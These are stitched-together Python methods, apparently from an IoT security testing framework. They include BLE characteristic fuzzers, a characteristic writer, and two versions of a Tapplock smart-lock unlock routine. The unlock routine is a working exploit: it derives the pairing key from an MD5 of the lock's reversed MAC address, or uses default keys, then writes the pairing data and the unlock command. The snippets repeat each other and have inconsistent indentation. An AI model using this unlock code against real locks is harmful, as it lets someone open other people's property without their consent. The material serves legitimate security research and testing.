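    def execute(self):
        """Fuzz a BLE characteristic by writing randomised values to it.

        Every ``xx`` in ``self.args.value`` is replaced by a random byte
        (two hex digits) and the result is written ``self.args.iter`` times
        to ``self.args.handle`` on the device at ``self.args.addr``. Any
        exception raised while connecting or writing is recorded on
        ``self.result``; the device is disconnected in all cases.
        """
        TLog.generic(
            "Fuzzing the value ({}), iterations ({}) for handle ({}) on BLE device ({})"
            .format(self.args.value, self.args.iter, hex(self.args.handle),
                    self.args.addr))
        # Bound before the try so the finally clause cannot hit an unbound
        # local (UnboundLocalError) when BlePeripheral() itself raises.
        device = None
        try:
            device = BlePeripheral()
            device.connect(
                self.args.addr,
                addrType=(Ble.ADDR_TYPE_RANDOM
                          if self.args.randaddrtype else Ble.ADDR_TYPE_PUBLIC),
            )
            for _ in range(self.args.iter):
                value = self.args.value
                # Replace one placeholder per pass so every "xx" gets its
                # own random byte rather than all sharing the first draw.
                while "xx" in value:
                    value = value.replace(
                        "xx",
                        "{:02x}".format(randint(0, 0xFF)),  # nosec
                        1,
                    )

                TLog.trydo("Writing the fuzzed value ({})".format(value))
                device.writeCharacteristic(
                    self.args.handle,
                    bytes.fromhex(value),
                    withResponse=(not self.args.noresponse),
                )
        except:  # noqa: E722
            # Project convention: the plugin result object records whatever
            # exception is in flight instead of the plugin aborting.
            self.result.exception()
        finally:
            if device is not None:
                device.disconnect()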
 def execute(self):
     """Write ``self.args.value`` (a hex string) to one characteristic handle.

     Connects to ``self.args.addr`` using the random or public address
     type selected by ``self.args.randaddrtype``, writes the decoded bytes
     to ``self.args.handle`` and records any exception on ``self.result``.
     The device is disconnected in all cases.
     """
     TLog.generic(
         "Writing the value ({}) to handle ({}) on BLE device ({})".format(
             self.args.value, hex(self.args.handle), self.args.addr
         )
     )
     device = BlePeripheral()
     try:
         # Keep argument evaluation inside the try so a bad hex string or a
         # missing attribute is recorded on the result like any other error.
         if self.args.randaddrtype:
             addr_type = ADDR_TYPE_RANDOM
         else:
             addr_type = ADDR_TYPE_PUBLIC
         device.connect(self.args.addr, addrType=addr_type)
         payload = bytes.fromhex(self.args.value)
         device.writeCharacteristic(
             self.args.handle,
             payload,
             withResponse=not self.args.noresponse,
         )
     except:  # noqa: E722
         self.result.exception()
     finally:
         device.disconnect()
    def unlock(self, mac, name=None):
        """
        Send the Tapplock pairing data followed by the unlock command.

        Args:
            mac(str): The BLE address of the Tapplock
            name(str): The name of the Tapplock as advertised over BLE

        Returns:
            Nothing
        """
        device = BlePeripheral()
        try:
            TLog.trydo("Unlocking Tapplock ({})".format(mac))
            if self.args.default is False:
                # key1 and serial are slices of the MD5 hex digest of the
                # upper-cased MAC with its octets in reverse order.
                reversed_mac = ":".join(reversed(mac.upper().split(":")))
                digest = md5(reversed_mac.encode()).hexdigest()  # nosec
                key1, serial = digest[:8], digest[16:24]
                TLog.generic(
                    "(Calculated hash={})(key1={})(serial={})".format(
                        digest, key1, serial
                    )
                )
                pairing_data = self.PAIRPREXIX + key1 + serial
            else:
                TLog.generic(
                    "(default key1={})(default serial={})".format(
                        self.DEFKEY, self.DEFSERIAL
                    )
                )
                pairing_data = self.DEFPAIR
            # Checksum over the payload bytes; its two hex-encoded bytes are
            # appended in swapped order.
            checksum = sum(byte % 255 for byte in bytes.fromhex(pairing_data))
            checksum_hex = "{:04x}".format(checksum)
            pairing_data += checksum_hex[2:4] + checksum_hex[0:2]
            device.connect(mac, addrType=ADDR_TYPE_RANDOM)
            device.writeCharacteristic(self.UNLOCKHNDL, bytes.fromhex(pairing_data))
            device.writeCharacteristic(self.UNLOCKHNDL, bytes.fromhex(self.UNLOCKCMD))
            self.output_handler(tlogtype=TLog.TRYDO,
                                logkwargs=LOGPRETTY,
                                name=name,
                                addr=device.addr,
                                sent_pair_data=pairing_data,
                                sent_unlock_cmd=self.UNLOCKCMD)
        finally:
            device.disconnect()
    def unlock(self, mac):
        """
        Send the Tapplock pairing data followed by the unlock command.

        :param mac: The BLE address of the Tapplock
        :return: Nothing
        """
        device = BlePeripheral()
        try:
            TLog.trydo("Unlocking Tapplock ({})".format(mac))
            if self.args.default is False:
                # key1 and serial are slices of the MD5 hex digest of the
                # upper-cased MAC with its octets in reverse order.
                reversed_mac = ":".join(reversed(mac.upper().split(":")))
                digest = md5(reversed_mac.encode()).hexdigest()  # nosec
                key1, serial = digest[:8], digest[16:24]
                TLog.generic("(Calculated hash={})(key1={})(serial={})".format(
                    digest, key1, serial))
                pairing_data = self.PAIRPREXIX + key1 + serial
            else:
                TLog.generic("(default key1={})(default serial={})".format(
                    self.DEFKEY, self.DEFSERIAL))
                pairing_data = self.DEFPAIR
            # Checksum over the payload bytes; its two hex-encoded bytes are
            # appended in swapped order.
            checksum = sum(byte % 255 for byte in bytes.fromhex(pairing_data))
            checksum_hex = "{:04x}".format(checksum)
            pairing_data += checksum_hex[2:4] + checksum_hex[0:2]
            device.connect(mac, addrType=ADDR_TYPE_RANDOM)
            TLog.trydo("Sending pair data({})".format(pairing_data))
            device.writeCharacteristic(self.UNLOCKHNDL,
                                       bytes.fromhex(pairing_data))
            TLog.trydo("Sending unlock command({})".format(self.UNLOCKCMD))
            device.writeCharacteristic(self.UNLOCKHNDL,
                                       bytes.fromhex(self.UNLOCKCMD))
        finally:
            device.disconnect()
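    def execute(self):
        """Fuzz a BLE characteristic by writing randomised values to it.

        Every ``xx`` in ``self.args.value`` is replaced by a random byte
        (two hex digits) and the result is written ``self.args.iter`` times
        to ``self.args.handle`` on the device at ``self.args.addr``. Any
        exception raised while connecting or writing is recorded on
        ``self.result``; the device is disconnected in all cases.
        """
        TLog.generic(
            "Fuzzing the value ({}), iterations ({}) for handle ({}) on BLE device ({})"
            .format(self.args.value, self.args.iter, hex(self.args.handle),
                    self.args.addr))
        # Bound before the try so the finally clause cannot hit an unbound
        # local (UnboundLocalError) when BlePeripheral() itself raises.
        device = None
        try:
            device = BlePeripheral()
            device.connect(self.args.addr,
                           addrType=(Ble.ADDR_TYPE_RANDOM if self.args.randaddrtype
                                     else Ble.ADDR_TYPE_PUBLIC))
            for _ in range(self.args.iter):
                fuzzed = self.args.value
                # Replace one placeholder per pass so every "xx" gets its
                # own random byte rather than all sharing the first draw.
                while "xx" in fuzzed:
                    fuzzed = fuzzed.replace(
                        "xx", "{:02x}".format(randint(0, 0xff)), 1)  # nosec

                TLog.trydo("Writing the fuzzed value ({})".format(fuzzed))
                device.writeCharacteristic(self.args.handle,
                                           bytes.fromhex(fuzzed),
                                           withResponse=(not self.args.noresponse))
        except:  # noqa: E722
            # Project convention: the plugin result object records whatever
            # exception is in flight instead of the plugin aborting.
            self.result.exception()
        finally:
            if device is not None:
                device.disconnect()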